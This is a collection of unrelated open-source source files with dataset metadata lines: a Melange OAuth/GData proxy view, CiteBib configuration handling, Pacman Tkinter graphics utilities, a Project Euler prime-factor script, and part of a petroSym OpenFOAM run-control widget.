adviti/melange | app/soc/views/oauth.py | 1 | 4862 | #!/usr/bin/env python2.5
#
# Copyright 2011 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing views for Open Auth.
"""
from django.conf.urls.defaults import url as django_url
from soc.views.helper.gdata_apis import oauth as oauth_helper
from soc.modules.gsoc.views.base import RequestHandler
from django.conf import settings
from django.utils import simplejson
class OAuthRedirectPage(RequestHandler):
"""Redirect page to Google Documents.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/oauth/redirect$', self, name='gdata_oauth_redirect'),
]
return patterns
def checkAccess(self):
self.check.isUser()
def context(self):
service = oauth_helper.createDocsService(self.data)
next = '%s?next=%s' % (self.redirect.urlOf('gdata_oauth_verify'),
self.request.GET.get('next','/'))
url = oauth_helper.generateOAuthRedirectURL(
service, self.data.user,
next)
context = {
'approval_page_url': url,
'page_name': 'Authorization Required',
}
return context
def templatePath(self):
"""Override this method to define a rendering template
"""
pass
class OAuthVerifyToken(RequestHandler):
"""Verify request token and redirect user.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/oauth/verify$', self, name='gdata_oauth_verify'),
]
return patterns
def get(self):
service = oauth_helper.createDocsService(self.data)
oauth_helper.checkOAuthVerifier(service, self.data)
next = self.request.GET.get('next','/')
self.redirect.toUrl(next)
return self.response
class PopupOAuthRedirectPage(RequestHandler):
"""Redirects popup page to Google Documents.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/popup/oauth/redirect$', self,
name='gdata_popup_oauth_redirect'),
]
return patterns
def checkAccess(self):
self.check.isUser()
def get(self):
access_token = oauth_helper.getAccessToken(self.data.user)
if access_token:
url = self.redirect.urlOf('gdata_popup_oauth_verified')
else:
service = oauth_helper.createDocsService(self.data)
next = '%s?next=%s' % (self.redirect.urlOf('gdata_oauth_verify'),
self.redirect.urlOf('gdata_popup_oauth_verified'))
url = oauth_helper.generateOAuthRedirectURL(
service, self.data.user,
next)
self.redirect.toUrl(url)
return self.response
class PopupOAuthVerified(RequestHandler):
""" Calls parent window's methods to indicate successful login.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/popup/oauth/verified$', self,
name='gdata_popup_oauth_verified')
]
return patterns
def checkAccess(self):
self.check.canAccessGoogleDocs()
def get(self):
html = (
"<html><body><script type='text/javascript'>"
" window.opener.melange.gdata.loginSuccessful();"
" window.close();"
"</script></body></html>"
)
self.response.write(html)
class MakeRequest(RequestHandler):
"""Work as a proxy view and deliver JS request to GData server.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/make_request$', self, name='gdata_make_request')
]
return patterns
def checkAccess(self):
self.check.canAccessGoogleDocs()
def post(self):
params = self.request.POST
gdata_service = oauth_helper.createGDataService(self.data)
service_name = params['service_name']
method = params.get('method', 'GET')
data = simplejson.loads(params.get('data', '{}'))
url = params['url']
if not url.startswith('https'):
host = settings.GDATA_HOSTS[service_name]
url = 'https://%s%s' % (host, url)
alt = params.get('alt')
if alt == 'json':
url = url + '?alt=json'
headers = simplejson.loads(params.get('headers','{}'))
if not 'GData-Version' in headers:
headers['GData-Version'] = '1.0'
response = gdata_service.request(method, url, data, headers=headers)
response_data = response.read().decode('utf-8')
self.response.write(response_data)
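# Hypothetical request payload for the proxy above (illustration only; the field values are
# made up, not taken from the project): a JavaScript client would POST something like
#   service_name=docs, method=GET, url=/feeds/default/private/full, alt=json,
#   headers={"GData-Version": "3.0"}
# and receive the GData response body back, decoded as UTF-8.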
| apache-2.0 | 6,183,347,659,760,637,000 | 27.6 | 81 | 0.654463 | false |
sciunto-org/CiteBib | libcitebib/config.py | 1 | 9239 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>
#
# Author: Francois Boulogne <fboulogne at sciunto dot org>, 2012
import configparser
import os
class ConfigBibtex():
"""
Load bibtex files from configuration files
:param name: name of the configuration
:param location: path of the config directory
"""
def __init__(self, name='bibtex.conf', location='~/.config/citebib'):
filename = str(name)
filepath = os.path.join(os.path.expanduser(location), filename)
self.config = configparser.ConfigParser()
self.config.read(filepath)
def get_bibtex_paths(self):
"""
Get a list containing paths of bibtex files
"""
paths = []
for section in self.config.sections():
path = os.path.expanduser(self.config[section].get('path'))
paths.append(path)
return paths
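# Usage sketch (added comment, assuming the default files written by check_default_config()
# below): reading the configured bibliography paths would look roughly like this.
#
#   conf = ConfigBibtex()                  # reads ~/.config/citebib/bibtex.conf
#   for path in conf.get_bibtex_paths():
#       print(path)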
class ConfigFormat():
"""
Load custom formats from configuration files
:param format: biblio format (raw, latex or bibtex)
:param name: name of the configuration
:param location: path of the config directory
:returns: the configuration
"""
def __init__(self, format, name='default.conf', location='~/.config/citebib'):
self.format = format
filename = str(name)
filepath = os.path.join(os.path.expanduser(location), str(format), filename)
self.config = configparser.ConfigParser()
self.config.read(filepath)
def get_reqfields(self, section):
"""
Return required fields
:param section: Section of the config file
:returns: list
:raises KeyError: wrong section
:raises ValueError: wrong format
"""
if self.format == 'bibtex':
content = []
try:
for element in self.config[section]:
if self.config[section].getboolean(element):
content.append(element)
except KeyError:
raise ValueError('The section does not exists %s' % section)
elif self.format == 'latex' or self.format == 'raw':
content = []
#TODO: possibility must be read from config
#Then, use a set to make sure each appears once
possibilities = ('publisher', 'institution', 'booktitle', 'title',
'author', 'pages', 'volume', 'editor',
'year', 'bookpublisher', 'journal')
try:
line = self.config[section].get('format')
except KeyError:
raise ValueError('The section does not exists: %s' % section)
for possibility in possibilities:
if possibility in line:
content.append(possibility)
else:
raise ValueError('Wrong format: %s' % self.format)
return(content)
def get_style(self, section):
"""
Return the style (relevant only for latex and raw format)
:param section: Section of the config file
:returns: string
"""
if self.format == 'latex' or self.format == 'raw':
return self.config[section].get('format')
else:
raise ValueError('Wrong format: %s' % self.format)
def get_number_authors(self, section):
"""
Return the number of authors (relevant only for latex and raw format)
:param section: Section of the config file
:returns: float
"""
if self.format == 'latex' or self.format == 'raw':
return self.config[section].getint('authorlength')
else:
raise ValueError('Wrong format: %s' % self.format)
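# Illustrative example (added comment, based on the default latex configuration written
# below): ConfigFormat('latex').get_style('article') returns
# 'author, journal, \textbf{volume}, pages (year).' and get_reqfields('article') picks out
# the field names that occur in that format string.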
def check_default_config(location='~/.config/citebib'):
"""
    Check if the default configuration files exist.
    If they do not, create them.
"""
os.makedirs(os.path.expanduser(location), exist_ok=True)
# Write bibtex location config file
file = os.path.join(os.path.expanduser(location), 'bibtex.conf')
bibfile = os.path.join(os.path.expanduser(location), 'example.bib')
if not os.access(file, os.F_OK):
with open(file, 'w') as fh:
fh.write("[example]\n")
ex_path = "path=" + os.path.join(location, 'example.bib')
fh.write(ex_path)
with open(bibfile, 'w') as fh:
fh.write("""@article{Cesar2013,
\tauthor = {C{\\'e}sar, J.},
\tjournal = {Nice Journal},
\tpages = {12--23},
\ttitle = {An amazing title},
\tvolume = {12},
\tyear = {2013},
}\n
""")
# Write printing mode config files
formats = ('latex', 'bibtex', 'raw')
for format in formats:
path = os.path.join(os.path.expanduser(location), format)
if not os.path.exists(path):
os.makedirs(path)
file = os.path.join(path, 'default.conf')
if not os.access(file, os.F_OK):
write_default_config(file, format)
def write_default_config(inifile, format):
"""
This function is a wrapper to write default config files
:param inifile: ini file name
    :param format: biblio format (latex, bibtex or raw)
"""
if format == 'latex':
_write_default_config_latex(inifile)
elif format == 'bibtex':
_write_default_config_bibtex(inifile)
elif format == 'raw':
_write_default_config_raw(inifile)
else:
raise ValueError('Wrong format: %s' % format)
def _write_default_config_latex(inifile):
"""
Write a default configuration file for latex
:param inifile: ini file name
"""
fields = {
'article': ('author, journal, \\textbf{volume}, pages (year).'),
'book': ('author, title, publisher (year).'),
'phdthesis' : ('author, Ph.D. thesis, school (year).'),
'inproceedings' : ('author, title in booktitle (year).'),
'unpublished': ('author, title'),
}
config = configparser.ConfigParser()
for entry in fields:
content = {'format': fields[entry], 'authorlength': 0} # TODO
config[entry] = content
with open(inifile, 'w') as configfile:
config.write(configfile)
def _write_default_config_raw(inifile):
"""
Write a default configuration file for raw
:param inifile: ini file name
"""
fields = {
'article': ('author, journal, volume, pages (year).'),
'book': ('author, title, publisher (year).'),
'phdthesis' : ('author, Ph.D. thesis, school (year).'),
'inproceedings' : ('author, title in booktitle (year).'),
'unpublished': ('author, title.'),
}
config = configparser.ConfigParser()
for entry in fields:
content = {'format': fields[entry], 'authorlength': 0} # TODO
config[entry] = content
with open(inifile, 'w') as configfile:
config.write(configfile)
def _write_default_config_bibtex(inifile):
"""
Write a default configuration file for bibtex
:param inifile: ini file name
"""
# TODO: this is messy. Look for suitable configparser function
# TODO: prefer a smart ordering (like alpha)
reqfields = {
'article': ('author', 'title', 'journal', 'volume', 'year', 'pages'),
'book': ('author', 'editor', 'title', 'publisher', 'year'),
'booklet': ('title'),
'conference': ('author', 'title', 'booktitle', 'year'),
'inproceedings': ('author', 'title', 'booktitle', 'year'),
'inbook': ('author', 'editor', 'title', 'chapter', 'pages', 'publisher', 'year'),
'incollection': ('author', 'title', 'bookpublisher', 'year'),
'manual': ('title'),
'mastersthesis': ('author', 'title', 'school', 'year'),
'misc': (''),
'phdthesis': ('author', 'title', 'school', 'year'),
'proceedings': ('title', 'year'),
'techreport': ('author', 'title', 'institution', 'year'),
'unpublished': ('author', 'title'),
}
fields = ('author', 'editor', 'publisher', 'bookpublisher',
'title', 'booktitle', 'journal', 'volume',
'year', 'pages', 'institution', 'school')
config = configparser.ConfigParser()
content = {}
for el in reqfields:
for field in fields:
if field in reqfields[el]:
content.update({field: True})
else:
content.update({field: False})
config[el] = content
with open(inifile, 'w') as configfile:
config.write(configfile)
if __name__ == '__main__':
pass
| gpl-3.0 | -4,720,389,608,554,132,000 | 33.602996 | 97 | 0.583613 | false |
DominikDitoIvosevic/Uni | AI/lab2/graphicsUtils.py | 1 | 11867 | # graphicsUtils.py
# ----------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# ([email protected]) and Dan Klein ([email protected]).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel ([email protected]).
import sys
import math
import random
import string
import time
import types
import Tkinter
#from PIL import ImageTk, Image
_Windows = sys.platform == 'win32' # True if on Win95/98/NT
_root_window = None # The root window for graphics output
_canvas = None # The canvas which holds graphics
_canvas_xs = None # Size of canvas object
_canvas_ys = None
_canvas_x = None # Current position on canvas
_canvas_y = None
_canvas_col = None # Current colour (set to black below)
_canvas_tsize = 12
_canvas_tserifs = 0
def formatColor(r, g, b):
return '#%02x%02x%02x' % (int(r * 255), int(g * 255), int(b * 255))
def colorToVector(color):
return map(lambda x: int(x, 16) / 256.0, [color[1:3], color[3:5], color[5:7]])
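# Example (added comment): formatColor(1, 0.5, 0) returns '#ff7f00', and
# colorToVector('#ff7f00') maps it back to roughly [0.996, 0.496, 0.0].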
if _Windows:
_canvas_tfonts = ['times new roman', 'lucida console']
else:
_canvas_tfonts = ['times', 'lucidasans-24']
pass # XXX need defaults here
def sleep(secs):
global _root_window
if _root_window == None:
time.sleep(secs)
else:
_root_window.update_idletasks()
_root_window.after(int(1000 * secs), _root_window.quit)
_root_window.mainloop()
def begin_graphics(width=640, height=480, color=formatColor(0, 0, 0), title=None):
global _root_window, _canvas, _canvas_x, _canvas_y, _canvas_xs, _canvas_ys, _bg_color
# Check for duplicate call
if _root_window is not None:
# Lose the window.
_root_window.destroy()
# Save the canvas size parameters
_canvas_xs, _canvas_ys = width - 1, height - 1
_canvas_x, _canvas_y = 0, _canvas_ys
_bg_color = color
# Create the root window
_root_window = Tkinter.Tk()
_root_window.protocol('WM_DELETE_WINDOW', _destroy_window)
_root_window.title(title or 'Graphics Window')
_root_window.resizable(0, 0)
# Create the canvas object
try:
_canvas = Tkinter.Canvas(_root_window, width=width, height=height)
_canvas.pack()
draw_background()
_canvas.update()
except:
_root_window = None
raise
# Bind to key-down and key-up events
_root_window.bind( "<KeyPress>", _keypress )
_root_window.bind( "<KeyRelease>", _keyrelease )
_root_window.bind( "<FocusIn>", _clear_keys )
_root_window.bind( "<FocusOut>", _clear_keys )
_root_window.bind( "<Button-1>", _leftclick )
_root_window.bind( "<Button-2>", _rightclick )
_root_window.bind( "<Button-3>", _rightclick )
_root_window.bind( "<Control-Button-1>", _ctrl_leftclick)
_clear_keys()
_leftclick_loc = None
_rightclick_loc = None
_ctrl_leftclick_loc = None
def _leftclick(event):
global _leftclick_loc
_leftclick_loc = (event.x, event.y)
def _rightclick(event):
global _rightclick_loc
_rightclick_loc = (event.x, event.y)
def _ctrl_leftclick(event):
global _ctrl_leftclick_loc
_ctrl_leftclick_loc = (event.x, event.y)
def wait_for_click():
while True:
global _leftclick_loc
global _rightclick_loc
global _ctrl_leftclick_loc
if _leftclick_loc != None:
val = _leftclick_loc
_leftclick_loc = None
return val, 'left'
if _rightclick_loc != None:
val = _rightclick_loc
_rightclick_loc = None
return val, 'right'
if _ctrl_leftclick_loc != None:
val = _ctrl_leftclick_loc
_ctrl_leftclick_loc = None
return val, 'ctrl_left'
sleep(0.05)
def draw_background():
corners = [(0,0), (0, _canvas_ys), (_canvas_xs, _canvas_ys), (_canvas_xs, 0)]
polygon(corners, _bg_color, fillColor=_bg_color, filled=True, smoothed=False)
def _destroy_window(event=None):
sys.exit(0)
# global _root_window
# _root_window.destroy()
# _root_window = None
#print "DESTROY"
def end_graphics():
global _root_window, _canvas, _mouse_enabled
try:
try:
sleep(1)
if _root_window != None:
_root_window.destroy()
except SystemExit, e:
print 'Ending graphics raised an exception:', e
finally:
_root_window = None
_canvas = None
_mouse_enabled = 0
_clear_keys()
def clear_screen(background=None):
global _canvas_x, _canvas_y
_canvas.delete('all')
draw_background()
_canvas_x, _canvas_y = 0, _canvas_ys
def polygon(coords, outlineColor, fillColor=None, filled=1, smoothed=1, behind=0, width=1):
c = []
for coord in coords:
c.append(coord[0])
c.append(coord[1])
if fillColor == None: fillColor = outlineColor
if filled == 0: fillColor = ""
poly = _canvas.create_polygon(c, outline=outlineColor, fill=fillColor, smooth=smoothed, width=width)
if behind > 0:
_canvas.tag_lower(poly, behind) # Higher should be more visible
return poly
def square(pos, r, color, filled=1, behind=0):
x, y = pos
coords = [(x - r, y - r), (x + r, y - r), (x + r, y + r), (x - r, y + r)]
return polygon(coords, color, color, filled, 0, behind=behind)
def circle(pos, r, outlineColor, fillColor, endpoints=None, style='pieslice', width=2):
x, y = pos
x0, x1 = x - r - 1, x + r
y0, y1 = y - r - 1, y + r
if endpoints == None:
e = [0, 359]
else:
e = list(endpoints)
while e[0] > e[1]: e[1] = e[1] + 360
return _canvas.create_arc(x0, y0, x1, y1, outline=outlineColor, fill=fillColor,
extent=e[1] - e[0], start=e[0], style=style, width=width)
def image(pos, file="../../blueghost.gif"):
x, y = pos
# img = PhotoImage(file=file)
#img = ImageTk.PhotoImage(Image.open(file))
return _canvas.create_image(x, y, image = Tkinter.PhotoImage(file=file), anchor = Tkinter.NW)
def refresh():
_canvas.update_idletasks()
def moveCircle(id, pos, r, endpoints=None):
global _canvas_x, _canvas_y
x, y = pos
# x0, x1 = x - r, x + r + 1
# y0, y1 = y - r, y + r + 1
x0, x1 = x - r - 1, x + r
y0, y1 = y - r - 1, y + r
if endpoints == None:
e = [0, 359]
else:
e = list(endpoints)
while e[0] > e[1]: e[1] = e[1] + 360
#edit(id, ('start', e[0]), ('extent', e[1] - e[0]))
move_to(id, x0, y0)
def edit(id, *args):
_canvas.itemconfigure(id, **dict(args))
def text(pos, color, contents, font='Helvetica', size=12, style='normal', anchor="nw"):
global _canvas_x, _canvas_y
x, y = pos
font = (font, str(size), style)
return _canvas.create_text(x, y, fill=color, text=contents, font=font, anchor=anchor)
def changeText(id, newText, font=None, size=12, style='normal'):
_canvas.itemconfigure(id, text=newText)
if font != None:
_canvas.itemconfigure(id, font=(font, '-%d' % size, style))
def changeColor(id, newColor):
_canvas.itemconfigure(id, fill=newColor)
def line(here, there, color=formatColor(0, 0, 0), width=2):
x0, y0 = here[0], here[1]
x1, y1 = there[0], there[1]
return _canvas.create_line(x0, y0, x1, y1, fill=color, width=width)
##############################################################################
### Keypress handling ########################################################
##############################################################################
# We bind to key-down and key-up events.
_keysdown = {}
_keyswaiting = {}
# This holds an unprocessed key release. We delay key releases by up to
# one call to keys_pressed() to get round a problem with auto repeat.
_got_release = None
def _keypress(event):
global _got_release
#remap_arrows(event)
_keysdown[event.keysym] = 1
_keyswaiting[event.keysym] = 1
# print event.char, event.keycode
_got_release = None
def _keyrelease(event):
global _got_release
#remap_arrows(event)
try:
del _keysdown[event.keysym]
except:
pass
_got_release = 1
def remap_arrows(event):
# TURN ARROW PRESSES INTO LETTERS (SHOULD BE IN KEYBOARD AGENT)
if event.char in ['a', 's', 'd', 'w']:
return
if event.keycode in [37, 101]: # LEFT ARROW (win / x)
event.char = 'a'
if event.keycode in [38, 99]: # UP ARROW
event.char = 'w'
if event.keycode in [39, 102]: # RIGHT ARROW
event.char = 'd'
if event.keycode in [40, 104]: # DOWN ARROW
event.char = 's'
def _clear_keys(event=None):
global _keysdown, _got_release, _keyswaiting
_keysdown = {}
_keyswaiting = {}
_got_release = None
def keys_pressed(d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
d_o_e(d_w)
if _got_release:
d_o_e(d_w)
return _keysdown.keys()
def keys_waiting():
global _keyswaiting
keys = _keyswaiting.keys()
_keyswaiting = {}
return keys
# Block for a list of keys...
def wait_for_keys():
keys = []
while keys == []:
keys = keys_pressed()
sleep(0.05)
return keys
def remove_from_screen(x,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
_canvas.delete(x)
d_o_e(d_w)
def _adjust_coords(coord_list, x, y):
for i in range(0, len(coord_list), 2):
coord_list[i] = coord_list[i] + x
coord_list[i + 1] = coord_list[i + 1] + y
return coord_list
def move_to(object, x, y=None,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
if y is None:
try: x, y = x
        except: raise Exception('incomprehensible coordinates')
horiz = True
newCoords = []
current_x, current_y = _canvas.coords(object)[0:2] # first point
for coord in _canvas.coords(object):
if horiz:
inc = x - current_x
else:
inc = y - current_y
horiz = not horiz
newCoords.append(coord + inc)
_canvas.coords(object, *newCoords)
d_o_e(d_w)
def move_by(object, x, y=None,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT, lift=False):
if y is None:
try: x, y = x
except: raise Exception, 'incomprehensible coordinates'
horiz = True
newCoords = []
for coord in _canvas.coords(object):
if horiz:
inc = x
else:
inc = y
horiz = not horiz
newCoords.append(coord + inc)
_canvas.coords(object, *newCoords)
d_o_e(d_w)
if lift:
_canvas.tag_raise(object)
def writePostscript(filename):
"Writes the current canvas to a postscript file."
psfile = file(filename, 'w')
psfile.write(_canvas.postscript(pageanchor='sw',
y='0.c',
x='0.c'))
psfile.close()
ghost_shape = [
(0, - 0.5),
(0.25, - 0.75),
(0.5, - 0.5),
(0.75, - 0.75),
(0.75, 0.5),
(0.5, 0.75),
(- 0.5, 0.75),
(- 0.75, 0.5),
(- 0.75, - 0.75),
(- 0.5, - 0.5),
(- 0.25, - 0.75)
]
if __name__ == '__main__':
begin_graphics()
clear_screen()
ghost_shape = [(x * 10 + 20, y * 10 + 20) for x, y in ghost_shape]
g = polygon(ghost_shape, formatColor(1, 1, 1))
move_to(g, (50, 50))
circle((150, 150), 20, formatColor(0.7, 0.3, 0.0), endpoints=[15, - 15])
sleep(2)
| mit | 2,995,610,118,131,092,000 | 28.593516 | 104 | 0.581444 | false |
NoahBaird/Project-Euler | Problem 3 - Largest prime factor/Python 1.0.py | 1 | 1112 | from math import sqrt
def checkIfDone(num):
if num == 1:
return True
return False
def IsPrime(num):
    for i in range(2, int(sqrt(num)) + 1):  # include the square root itself as a candidate divisor
if num % i == 0:
return False
return True
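# The search below relies on the fact that, after factors of 2 and 3 are
# stripped out, every remaining prime factor has the form 6k - 1 or 6k + 1,
# so only candidates of that form need to be tested.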
def findLargestPrimeFactor(num):
done = False
largestFactor = 1
while num % 2 == 0:
num = num / 2
largestFactor = 2
done = checkIfDone(num)
while num % 3 == 0:
num = num / 3
largestFactor = 3
done = checkIfDone(num)
iterator = 1
while not done:
posPrime1 = iterator * 6 - 1
posPrime2 = iterator * 6 + 1
if IsPrime(posPrime1):
while num % posPrime1 == 0:
num = num / posPrime1
largestFactor = posPrime1
if IsPrime(posPrime2):
            while num % posPrime2 == 0:
num = num/posPrime2
largestFactor = posPrime2
done = checkIfDone(num)
iterator += 1
return largestFactor
print findLargestPrimeFactor(600851475143)
| mit | 4,260,531,782,545,222,700 | 19.803922 | 42 | 0.504496 | false |
jmarcelogimenez/petroSym | petroSym/run.py | 1 | 11910 | # -*- coding: utf-8 -*-
"""
Created on Tue Aug 25 13:08:19 2015
@author: jgimenez
"""
from PyQt4 import QtGui, QtCore
from run_ui import Ui_runUI
from PyFoam.RunDictionary.ParsedParameterFile import ParsedParameterFile
import os
from reset import *
from time import localtime, strftime, struct_time
from logTab import *
from ExampleThread import *
from utils import *
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class runUI(QtGui.QScrollArea, Ui_runUI):
def __init__(self, parent=None, f=QtCore.Qt.WindowFlags()):
QtGui.QScrollArea.__init__(self, parent)
self.setupUi(self)
class runWidget(runUI):
def __init__(self, currentFolder, solvername):
runUI.__init__(self)
self.solvername = solvername
self.currentFolder = currentFolder
def setCurrentFolder(self, currentFolder, solvername):
self.currentFolder = currentFolder
self.solvername = solvername
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
        # If the GUI is opened while a case is already running, disable these buttons
if (self.window().runningpid!= -1):
self.pushButton_run.setEnabled(False)
self.pushButton_reset.setEnabled(False)
if self.window().nproc<=1:
self.type_serial.setChecked(True)
self.type_parallel.setChecked(False)
else:
self.type_serial.setChecked(False)
self.type_parallel.setChecked(True)
self.num_proc.setValue(self.window().nproc)
self.pushButton_decompose.setEnabled(False)
self.changeType()
def runCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
# if self.window().nproc>1:
# w = QtGui.QMessageBox(QtGui.QMessageBox.Information, "Is the case decomposed?", "Simulation will be done only if case decompositione was done previously. Continue?", QtGui.QMessageBox.Yes|QtGui.QMessageBox.No)
# ret = w.exec_()
# if(QtGui.QMessageBox.No == ret):
# return
        # Modify the controlDict because the simulation may have been stopped earlier
filename = '%s/system/controlDict'%self.currentFolder
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['stopAt'] = 'endTime'
parsedData.writeFile()
self.window().removeFilesPostPro()
        # Backdate the controlDict modification time by one minute
tt = list(localtime())
        tt[4] = (tt[4]-1)%60 # Use the modulo so that when the minute is 0, 0-1 wraps around instead of giving -1
command = 'touch -d "%s" %s'%(strftime("%Y-%m-%d %H:%M:%S", struct_time(tuple(tt))),filename)
os.system(command)
filename1 = '%s/run.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Run',filename1)
if self.window().nproc<=1:
command = '%s -case %s 1> %s 2> %s &'%(self.solvername,self.currentFolder,filename1,filename2)
else:
command = 'mpirun -np %s %s -case %s -parallel 1> %s 2> %s & '%(str(self.window().nproc),self.solvername,self.currentFolder,filename1, filename2)
os.system(command)
if self.window().nproc<=1:
command = 'pidof %s'%self.solvername
else:
command = 'pidof mpirun'
import subprocess
self.window().runningpid = subprocess.check_output(command, shell=True)
        self.window().runningpid = self.window().runningpid.replace('\n','') # pidof returns the pid with a trailing newline
        self.window().runningpid = int(self.window().runningpid) # and as a string, so convert it to an int
self.window().save_config()
self.pushButton_run.setEnabled(False)
self.pushButton_reset.setEnabled(False)
self.window().tab_mesh.setEnabled(False)
self.window().refresh_pushButton.setEnabled(False)
leave = [1,5]
for i in range(self.window().treeWidget.topLevelItemCount()):
if i not in leave:
self.window().treeWidget.topLevelItem(i).setDisabled(True)
self.window().findChild(logTab,'%s/run.log'%self.currentFolder).findChild(QtGui.QPushButton,'pushButton_3').setEnabled(True)
self.window().updateLogFiles()
def changeType(self):
nprocOld = self.window().nproc
if self.type_serial.isChecked():
self.num_proc.setEnabled(False)
if nprocOld==1:
self.pushButton_decompose.setText('Apply')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/save16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
else:
self.pushButton_decompose.setText('Apply and Reconstruct Case')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/reconstruct16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_decompose.setIcon(icon)
self.pushButton_reconstruct.setEnabled(True)
            self.pushButton_reconstruct.setText("Reconstruct Case (use under your own responsibility)")
self.pushButton_decompose.setEnabled(True)
else:
self.num_proc.setEnabled(True)
self.pushButton_decompose.setText('Apply and Decompose Case')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/decompose16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_decompose.setIcon(icon)
self.pushButton_reconstruct.setEnabled(True)
            self.pushButton_reconstruct.setText("Reconstruct Case (use under your own responsibility)")
self.pushButton_decompose.setEnabled(True)
def resetCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
w = reset()
result = w.exec_()
if result:
self.window().nproc = 1
command = 'pyFoamClearCase.py %s %s'%(w.getParams(), self.currentFolder)
os.system(command)
#if w.deleteSnapshots():
# command = 'rm -rf %s/postProcessing/snapshots'%self.currentFolder
# os.system(command)
if w.resetFigures():
self.window().resetFigures(w.deletePostpro(),True)
filename = '%s/system/controlDict'%self.currentFolder
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['startFrom'] = 'startTime'
parsedData['startTime'] = '0'
parsedData.writeFile()
self.window().typeFile = {}
self.window().pending_files = []
self.window().pending_dirs = []
self.window().updateLogFiles()
self.type_serial.setChecked(True)
self.type_parallel.setChecked(False)
self.changeType()
self.window().save_config()
def decomposeCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
nprocOld = self.window().nproc
if self.type_serial.isChecked():
if nprocOld>1:
self.reconstructCase()
self.window().nproc = 1
else:
if nprocOld == self.num_proc.value():
QtGui.QMessageBox.about(self, "ERROR", "Case already decomposed.")
return
if nprocOld>1 and nprocOld != self.num_proc.value():
QtGui.QMessageBox.about(self, "ERROR", "The case must be reconstructed before decompose with other number of processors.")
return
self.window().nproc = self.num_proc.value()
        # If the time is zero, only some of the fields have to be decomposed
if self.currtime=='0':
            # Modify the decomposition dictionary
filename = '%s/system/decomposeParDict'%(self.currentFolder)
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['numberOfSubdomains'] = self.window().nproc
parsedData.writeFile()
            # Decompose only the fields used by the solver and leave the rest untouched
command = 'mv %s %s.bak'%(self.timedir,self.timedir)
os.system(command)
command = 'mkdir %s'%(self.timedir)
os.system(command)
for ifield in self.fields:
command = 'cp %s.bak/%s %s/.'%(self.timedir,ifield,self.timedir)
os.system(command)
filename1 = '%s/decompose.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Decompose',filename1)
command = 'decomposePar -force -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
command = 'rm -r %s'%(self.timedir)
os.system(command)
command = 'mv %s.bak %s'%(self.timedir,self.timedir)
os.system(command)
else:
            # If the run has already advanced, everything has to be decomposed
filename = '%s/system/decomposeParDict'%(self.currentFolder)
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['numberOfSubdomains'] = self.window().nproc
parsedData.writeFile()
filename1 = '%s/decompose.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Decompose',filename1)
command = 'decomposePar -force -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
self.window().save_config()
        w = QtGui.QMessageBox(QtGui.QMessageBox.Information,"Decompose Case","The case has been successfully decomposed!")
w.exec_()
w.repaint()
QtGui.QApplication.processEvents()
return
def reconstructCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
